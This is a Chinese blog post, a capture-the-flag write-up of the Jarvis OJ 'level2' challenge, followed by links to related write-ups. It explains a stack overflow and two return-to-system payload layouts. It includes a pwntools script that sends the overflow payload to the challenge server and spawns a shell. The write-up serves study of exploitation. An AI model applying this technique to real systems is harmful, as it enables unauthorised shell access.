jarvis oj level2–两种方式构造函数栈

最新推荐文章于 2024-05-09 22:28:34 发布
最新推荐文章于 2024-05-09 22:28:34 发布
阅读量594 收藏
点赞数 1
分类专栏: 汇编与逆向 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zpy1998zpy/article/details/89072021
版权

关于这个level2,在网上找到了两种解法,放在一起分析了一下。

首先查看题目基本信息:

程序开启了栈不可执行保护。

IDA查看反汇编代码:

可以看到存在栈溢出,并且程序调用了system函数。

所以我们的思路就是构造vulnerable_function()的buf变量,使得:返回地址被覆盖为system函数的地址,构造system函数的栈帧,并为system传递参数’/bin/sh’。

先说第一种payload1的构造:

a*0x88(buf)+a*4(ebp)+system地址+构造的任意的system函数返回地址+’/bin/sh’字符串的地址(system函数的参数)

我们从payload分析原理

填充buf后:

当 vulnerable 函数执行到返回地址出栈时,即 pop 出 system_addr 程序跳转到system函数时,栈顶为我们构造的xxxxx(无效的system返回地址),紧接着就是’/bin/sh’的地址。来看此时的栈分布,就相当于调用了system(‘/bin/sh’)。

此时的栈帧结构符合正常调用system函数的栈帧结构(只有返回地址,这也就是为什么要构造一个无效的返回地址),所以system可以正常执行。

也就是说我们完成了system函数栈帧的构造

第二种payload构造:

a*0x88(buf)+a*4(ebp)+call_system地址+’/bin/sh’字符串的地址(system函数的参数)

call_system地址是指从main函数(或者其他函数)调用system函数的那条指令的地址。

还是从 vulnerable_function执行完说起,最后一条指令ret 执行完后,system地址出栈,程序跳转到call system那一条指令处。此时栈的情况:栈顶为’/bin/sh’的地址。与第一种情况相比少了一个构造的任意返回地址。

当执行call system函数时,又会向栈中压入一个返回地址,就是call system的下一条指令的地址。所以说call 指令完成了payload1中的构造任意返回地址。

附上最终的代码:

from pwn import *
 context(log_level = "debug",arch = "i386",os = "linux")
 ip = 'pwn2.jarvisoj.com'
 port = '9878'
 io = remote(ip,port)
 padding = 0x8C * 'A'

 bin_sh_addr = 0x0804A024
 system_addr=0x08048320
 call_system_addr = 0x0804849E

 payload = padding +  p32(call_system_addr) +  p32(bin_sh_addr)
 payload = padding +  p32(system_addr) + p32(1) + p32(bin_sh_addr)

 io.recvuntil('Input:')
 io.sendline(payload)
 io.interactive()

 

参考链接:

https://www.freebuf.com/column/183879.html

https://blog.csdn.net/qq_35661990/article/details/83902369

https://www.cnblogs.com/WangAoBo/p/7622091.html

文章同步到我的博客:http://www.zjzhhb.com/archives/627

 

A1ienX
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_level2
m0_55086916的博客
11-29 655
第一个p32(0x08048320)是function函数的返回地址,第二个是system函数的返回地址,p32(0x0804a024)是system函数的第一个参数。注意到这里可以利用溢出漏洞,buf数组只给了0x88的大小,但是最多可以读入0x100个字节的数据,所以多读入的数据就会向下把给覆盖掉。于是想把function函数的返回地址覆盖成system函数的入口地址,然后把参数改成"bin/sh"字符串的地址。
jarvisoj_level2【BUUCTF】
qq_41696518的博客
08-26 667
jarvisoj_level2【BUUCTF】
jarvisoj_level2[BUUCTF]
最新发布
moonlightsunshin的博客
05-09 169
从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出,IDA会告诉我们buf数组与ebp在上的相对位置,即&buf=$ebp-0x88,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且system()的地址可以轻松在plt表中找到,为0x08048320,因此我们只需要在构造一个shell路径的字符转就可以getshell了。
jarvisoj-level2
qq_35661990的博客
11-09 1369
只开了NX,上不可执行 main函数 vulnerable_function(); system("echo 'Hello World!'"); return 0; function函数 char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x10...
[CTF]jarvisoj_level2
凉水的博客
01-12 497
解题思路 反编译后的源码: undefined4 main(void) { vulnerable_function(); system("echo \'Hello World!\'"); return 0; } void vulnerable_function(void) { undefined local_8c [136]; system("echo Input:"); read(0,local_8c,0x100); return; } 看完上面的反编译,直觉system函数
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
Graham Jarvis两种算法求散点集凸包
01-16
本篇文章将详细探讨两种用于求解平面散点集凸包的算法:Graham Jarvis算法和Jarvis步进法,并结合C++实现进行解析。 首先,我们来了解Graham Jarvis算法。这个算法以电脑科学家Ronald Graham命名,其核心思想是找到...
JARVIS:基于LLM控制万种API的架构
05-29
Language serves as an interface for LLMs to connect numerous AI models for solving complicated AI tasks! See our paper: [HuggingGPT: Solving AI Tasks with ChatGPT and its Friends in HuggingFace]...
jarvisoj level1-2
sun的博客
10-03 623
level1 先使用checksec查询一下这个保护机制没有开启任何保护 [*] '/home/sun/Desktop/1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x...
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 314
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,上开启了不可执行保护,但是没有检测标志,推测需要进行缓冲区溢出。
jarvisoj_level2题解
OrientalGlass的博客
01-08 225
这题没有现成的system("/bin/sh")可以调用,但是有system函数和/bin/sh字符串。所以可以通过溢出修改返回函数为call system位置,并且将顶元素修改为/bin/sh所在地址。这样就可以成功执行system("/bin/sh")2.ida查看,很显然这里有溢出。4.寻找system和bin/sh。1.checksec查看。
jarvisoj_level2_x64
、moddemod
06-17 526
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * context(log_level = 'debug') proc_name = './level2_x64' p =process(proc_name) p = remote('node3.buuoj.cn', 25838) elf = ELF(proc_name) system_addr = elf.sym['system'] bin_sh_str = 0x600a90 pop..
[buuctf]jarvisoj_level2
逆向萌新的博客
06-19 485
[buuctf]jarvisoj_level2
CTF buuoj pwn-----第9题:jarvisoj_level2
bing_Max的博客
09-27 753
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值